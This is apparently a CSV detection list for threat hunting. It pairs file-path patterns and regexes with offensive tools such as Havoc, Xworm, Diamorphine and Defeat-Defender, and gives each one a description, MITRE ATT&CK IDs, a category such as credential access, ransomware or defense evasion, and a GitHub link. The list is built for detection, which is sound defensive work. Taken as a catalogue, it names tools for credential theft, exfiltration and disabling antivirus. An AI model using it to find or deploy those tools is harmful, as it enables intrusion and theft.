"*\dashlane\getCredsdashlaneMaster.h*",".{0,1000}\\dashlane\\getCredsdashlaneMaster\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\Data\WinAuditDB.mdb*",".{0,1000}\\Data\\WinAuditDB\.mdb.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*\dbms\fingerprint.py*",".{0,1000}\\dbms\\fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","N/A","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*\dcrypt.exe*",".{0,1000}\\dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\dcrypt.sys*",".{0,1000}\\dcrypt\.sys.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\DCrypt\Bin*",".{0,1000}\\DCrypt\\Bin.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\dcrypt_setup.exe*",".{0,1000}\\dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*\dcs_weak_kerberos_ciphersuite.txt*",".{0,1000}\\dcs_weak_kerberos_ciphersuite\.txt.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","0","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*\dcshadow.html*",".{0,1000}\\dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*\ddspoof.py*",".{0,1000}\\ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\DDSpoof\networking\*",".{0,1000}\\DDSpoof\\networking\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\DDSpoof\sniffers\*",".{0,1000}\\DDSpoof\\sniffers\\.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*\deadPool.ps1*",".{0,1000}\\deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","9","1","60","9","2024-04-01T07:49:15Z","2023-12-04T07:05:48Z" "*\DecryptAutoLogon.exe*",".{0,1000}\\DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\decrypted.dmp*",".{0,1000}\\decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*\DECRYPT-FILES.txt*",".{0,1000}\\DECRYPT\-FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\Defeat-Defender-V1.2.0-main*",".{0,1000}\\Defeat\-Defender\-V1\.2\.0\-main.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\DelegationBOF.*",".{0,1000}\\DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*\DeletePSscriptSignning.bat*",".{0,1000}\\DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\DeleteWD.dll*",".{0,1000}\\DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\dementor.py*",".{0,1000}\\dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*\demiguise.py*",".{0,1000}\\demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","9","10","1344","253","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z" "*\Demo\VulnApp.exe*",".{0,1000}\\Demo\\VulnApp\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*\demon.dll*",".{0,1000}\\demon\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demon.x64.bin*",".{0,1000}\\demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demon.x64.exe*",".{0,1000}\\demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demon1.dll*",".{0,1000}\\demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\demosyscalls.exe*",".{0,1000}\\demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*\Dendrobate\*",".{0,1000}\\Dendrobate\\.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.bin*",".{0,1000}\\Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.exe*",".{0,1000}\\Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\Dendron.sln*",".{0,1000}\\Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*\DeployPrinterNightmare.exe*",".{0,1000}\\DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*\Desktop\FakeText.lnk*",".{0,1000}\\Desktop\\FakeText\.lnk.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\Development\GOLD-BACKDOOR\*",".{0,1000}\\Development\\GOLD\-BACKDOOR\\.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\dfscoerce.py*",".{0,1000}\\dfscoerce\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\diamorphine.c*",".{0,1000}\\diamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*\diamorphine.h*",".{0,1000}\\diamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*\DigitalOceanProxyTab.java*",".{0,1000}\\DigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*\DInjector.sln*",".{0,1000}\\DInjector\.sln.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*\DInjector\*",".{0,1000}\\DInjector\\.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*\dirbuster.py*",".{0,1000}\\dirbuster\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\dircreate2system.pdb*",".{0,1000}\\dircreate2system\.pdb.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*\dircreate2system.sln*",".{0,1000}dircreate2system\.sln.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*\DirCreate2System\bin\*",".{0,1000}\\DirCreate2System\\bin\\.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*\disableav.bat*",".{0,1000}\\disableav\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\DisableWD.7z*",".{0,1000}\\DisableWD\.7z.{0,1000}","offensive_tool_keyword","WDBypass","Disable Windows Defender (+ UAC Bypass, + Upgrade to SYSTEM)","T1089 - T1562.001 - T1548.002","TA0005 - TA0040 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://bitbucket.org/evilgreyswork/wd-uac/downloads/","1","0","https://blog.injectexp.dev/2024/02/28/disable-windows-defender-uac-bypass-upgrade-to-system/","10","10","N/A","N/A","N/A","N/A" "*\DisableWD.dll,*",".{0,1000}\\DisableWD\.dll,.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*\DiscordTokenExfilterater.cs*",".{0,1000}\\DiscordTokenExfilterater\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\dist\sigthief.exe*",".{0,1000}\\dist\\sigthief\.exe.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*\dkmc.py*",".{0,1000}\\dkmc\.py.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","0","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*\DLHell.py*",".{0,1000}\\DLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*\DLHell-main\*",".{0,1000}\\DLHell\-main\\.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*\DLL_Hijacking.*",".{0,1000}\\DLL_Hijacking\..{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tools","https://github.com/AlessandroZ/BeRoot","1","0","N/A","10","10","2363","465","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" "*\dllexploit.cpp*",".{0,1000}\\dllexploit\.cpp.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\dllexploit.exe*",".{0,1000}\\dllexploit\.exe.{0,1000}","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","126","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\DllExport.bat*",".{0,1000}\\DllExport\.bat.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\dll-hijack-by-proxying*",".{0,1000}\\dll\-hijack\-by\-proxying.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*\dll-hijack-by-proxying-master*",".{0,1000}\\dll\-hijack\-by\-proxying\-master.{0,1000}","offensive_tool_keyword","dll-hijack-by-proxying","Exploiting DLL Hijacking by DLL Proxying Super Easily","T1174 - T1574.007","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tothi/dll-hijack-by-proxying","1","0","N/A","7","4","395","82","2023-07-09T22:11:34Z","2020-07-08T18:11:17Z" "*\dllinjection_rs.exe*",".{0,1000}\\dllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\dllproxy.nim*",".{0,1000}\\dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" 